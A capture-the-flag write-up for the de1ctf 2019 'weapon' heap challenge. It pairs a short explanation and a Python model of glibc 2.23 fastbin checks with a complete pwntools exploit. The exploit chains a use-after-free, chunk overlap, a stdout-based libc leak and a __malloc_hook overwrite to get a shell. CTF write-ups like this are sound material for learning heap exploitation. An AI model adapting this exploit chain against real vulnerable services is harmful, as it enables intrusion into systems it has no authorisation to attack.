de1ctf_2019_weapon(16/100)

Approach

This challenge is actually fairly basic: there is a UAF but no show function, so we leak libc through _IO_FILE (stdout).
Because of the UAF, we can use an overlapping chunk to forge a chunk and get it freed into the unsorted bin.
A few points to note:
1. add can request at most 0x60, so when the forged chunk finally lands in the unsorted bin you have to account for not being able to allocate it back out afterwards; at the same time, build a fastbin chain that shares the same fd, and be careful with the chunk sizes.
2. The overlap has to pass the fastbin size check, and so does the stdout hijack, since the target is Ubuntu 16 (glibc 2.23).
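As an added illustration (this is not code from the original writeup), the following Python model of the glibc 2.23 fastbin consistency check shows what points 1 and 2 are about: a chunk handed out from a fastbin is accepted only if the fastbin index of its size field equals the index of the bin being served, nothing else about the size word is validated. With requests capped at 0x60 only the 0x20 to 0x70 bins are reachable, and a size field of 0x71 or 0x7f passes for a 0x60 request while 0x41 or 0xa1 does not. The function names and constants are mine and mirror the malloc.c macros they imitate.

```python
# Added model of the glibc 2.23 (Ubuntu 16.04, x86-64) fastbin checks.
# Not the writeup's code; names mirror the malloc.c macros they imitate.

SIZE_SZ = 8                        # sizeof(size_t) on x86-64
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1
MIN_CHUNK_SIZE = 0x20
GLOBAL_MAX_FAST = 0x80             # default global_max_fast: chunks <= 0x80 use fastbins


def request2size(req):
    """Chunk size glibc uses for malloc(req), with 64-bit rounding."""
    if req + SIZE_SZ + MALLOC_ALIGN_MASK < MIN_CHUNK_SIZE:
        return MIN_CHUNK_SIZE
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK


def chunksize(size_field):
    """Strip the PREV_INUSE, IS_MMAPPED and NON_MAIN_ARENA flag bits."""
    return size_field & ~0x7


def fastbin_index(sz):
    """malloc.c: ((unsigned int)(sz) >> (SIZE_SZ == 8 ? 4 : 3)) - 2"""
    return (sz >> 4) - 2


def fastbin_check(request, victim_size_field):
    """
    Model of the only validation _int_malloc() does on a chunk it pulls
    off a fastbin in glibc 2.23:

        if (fastbin_index (chunksize (victim)) != idx)
          malloc_printerr ("malloc(): memory corruption (fast)");

    Returns (accepted, reason). victim_size_field is the raw 8-byte size
    word found just before the pointer that came out of the bin's fd chain.
    """
    nb = request2size(request)
    if nb > GLOBAL_MAX_FAST:
        return False, "chunk size 0x%x is not served from a fastbin" % nb
    idx = fastbin_index(nb)
    victim_idx = fastbin_index(chunksize(victim_size_field))
    if victim_idx != idx:
        return False, ("malloc(): memory corruption (fast): size field 0x%x maps "
                       "to bin %d, bin %d expected" % (victim_size_field, victim_idx, idx))
    return True, "size field 0x%x accepted for bin %d (chunk 0x%x)" % (
        victim_size_field, idx, nb)


def reachable_fastbin_indices(max_request):
    """Fastbin indices a program can touch when its malloc() requests are capped."""
    return sorted({fastbin_index(request2size(r)) for r in range(max_request + 1)})


if __name__ == "__main__":
    # With the challenge's 0x60 cap only bins 0..5 (chunk sizes 0x20..0x70) are reachable.
    print(reachable_fastbin_indices(0x60))
    # Size fields used in the writeup, checked against the request that would fetch them.
    for req, size_field in [(0x30, 0x41), (0x60, 0x71), (0x60, 0x7f),
                            (0x60, 0xa1), (0x60, 0x41)]:
        ok, why = fastbin_check(req, size_field)
        print("malloc(0x%x) with size field 0x%x -> %s: %s" % (req, size_field, ok, why))
```

The model makes the constraint in point 1 concrete: because the 0xa1 size used to reach the unsorted bin maps to bin index 8, the forged chunk can only be allocated again after its size field is set back to 0x71 (bin 5, the same bin a 0x60 request is served from).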

EXP

from pwn import *

# Python 2 / older pwntools style: payloads are str, not bytes.
#p = process("./de1ctf_2019_weapon")
#p = remote('node4.buuoj.cn','27248')
# context.log_level = 'debug'
elf = ELF("./de1ctf_2019_weapon")
libc = ELF('./libc-2.23.so')
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]   # one_gadget offsets for this libc-2.23
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7",timeout = 1)[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f",timeout = 1)[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def cmd(choice):
    sla('choice >> ',choice)

def add(idx,size,content):
    cmd(1)
    sla('wlecome input your size of weapon: ',size)
    sla('input index: ',idx)
    p.sendafter('input your name:',content)

def edit(idx,content):
    cmd(3)
    sla('input idx:',idx)
    p.sendafter('new content:',content)

def delete(idx):
    cmd(2)
    sla('input idx :',idx)

def dbg():
    gdb.attach(p)
    pause()

def pwn():

    # Stage 1: three 0x40 chunks plus a 0x20 chunk. Chunk 2 and chunk 3 carry
    # fake headers (0xa0/0x21 and 0x20/0x21) that later satisfy the free()
    # checks on the "next" chunk when the forged chunk is freed as 0xa0.
    add(0,0x30,'a')
    add(1,0x30,'a')
    add(2,0x30,'a'*0x20 + p64(0xa0)+p64(0x21))
    add(3,0x10,p64(0x20)+p64(0x21))
    # Fake 0x41 chunk header inside chunk 0's data; it overlaps chunk 1.
    edit(0,p64(0)+p64(0x41))
    # UAF: free 2 then 1, then redirect 1's fd (low byte) to the fake chunk
    # and allocate twice so index 2 now points at the overlapping fake chunk.
    delete(2)
    delete(1)
    edit(1,'\x10')
    add(1,0x30,'a')
    add(2,0x30,'a')
    # Free the same fake chunk once as 0x70 (fastbin) and once as 0xa0
    # (unsorted bin), then restore the 0x71 size so it can be fetched again.
    edit(0,p64(0)+p64(0x71))
    delete(2)
    edit(0,p64(0)+p64(0xa1))
    delete(2)
    edit(0,p64(0)+p64(0x71))
    # Partial overwrite of the unsorted-bin fd (libc pointer): the low two bytes
    # now point at a fake 0x7f chunk just before _IO_2_1_stdout_. The high
    # nibble of the second byte is an ASLR guess (1 in 16), hence the retry loop.
    edit(2,p8(0xdd)+p8(0x65))
    add(2,0x60,'a')
    # Overwrite stdout's flags and the low byte of _IO_write_base to make
    # the next write leak libc pointers.
    add(4,0x60,'a'*51 + p64(0xfbad1800)+p64(0)*3 + p8(0x58))

    libc_leak = uu64()
    lg('libc_leak',libc_leak)
    libc_base = libc_leak - 0x3C56A3   # offset found in gdb
    lg('libc_base',libc_base)
    if((libc_base&0xfff)!= 0):
        exit(-1)
    malloc_hook = libc_base + libc.sym['__malloc_hook']
    one_gadget = gadgets[3]+libc_base
    # Fastbin attack on __malloc_hook via the 0x7f fake chunk at __malloc_hook-0x23.
    add(5,0x60,'a')
    delete(5)
    edit(5,p64(malloc_hook-0x23))
    add(6,0x60,'a')
    add(7,0x60,'a'*0x13 + p64(one_gadget))

    # Trigger __malloc_hook with one more allocation.
    cmd(1)
    sla('wlecome input your size of weapon: ',0x10)
    sla('input index: ',8)


if __name__ == '__main__':
    # Retry until the 4-bit ASLR guess in the partial overwrite is right.
    while(True):
        try:
            # p = process('./de1ctf_2019_weapon')
            p = remote('node4.buuoj.cn','28089')
            pwn()
            p.interactive()
            break
        except Exception:
            p.close()
            continue